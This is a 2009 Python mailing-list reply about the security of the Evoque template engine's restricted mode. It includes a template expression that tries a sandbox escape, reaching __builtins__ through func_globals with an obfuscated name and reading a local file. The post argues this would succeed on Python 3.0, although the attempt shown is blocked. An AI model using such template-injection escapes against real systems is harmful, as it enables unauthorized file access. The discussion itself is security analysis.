List comprehension - NameError: name '_[1]' is not defined ?

Mark Wooding mdw at distorted.org.uk
Thu Jan 15 21:36:36 CET 2009


mario ruggier <mario.ruggier at gmail.com> writes:

> Some info on its security is at:
> http://evoque.gizmojo.org/usage/restricted/ 

> Tell you what, if you find a security hole there (via exposed template
> source on a Domain(restricted=True) setup) I'll offer you a nice
> dinner (including the beer!) somewhere, maybe at some py conference,
> but even remotely if that is not feasible... ;-) The upcoming 0.4
> release will run on 2.4 thru to 3.0 -- you can have some fun with that
> one (the current 0.3 runs on 2.5 and 2.6).

I'm pretty sure I can break this on 3.0, because the f_restricted frame
flag has gone.  Here's how:

>>> import template, domain
>>> dom = domain.Domain('/tmp/mdw/', restricted = True, quoting = 'str')
>>> t = template.Template(dom, 'evil', from_string = True, src =
>>> "${inspect.func_globals['_'*2+'builtins'+'_'*2].open('/tmp/mdw/target').read()}")
2009-01-15 20:30:29,177 ERROR [evoque] RuntimeError: restricted
attribute:   File "<string>", line 1, in <module>
: EvalError(inspect.func_globals['_'*2+'builtins'+'_'*2].open('/tmp/mdw/target').read())
u'[RuntimeError: restricted attribute:   File "<string>", line 1, in
<module>\n:
EvalError(inspect.func_globals[\'_\'*2+\'builtins\'+\'_\'*2].open(\'/tmp/mdw/target\').read())]'

which means that it's depending on the func_globals attribute being
rejected by the interpreter -- which it won't be because 3.0 doesn't
have restricted evaluation any more.

Python is very leaky.  I don't think trying to restrict Python execution
is a game that's worth playing.

-- [mdw]



More information about the Python-list mailing list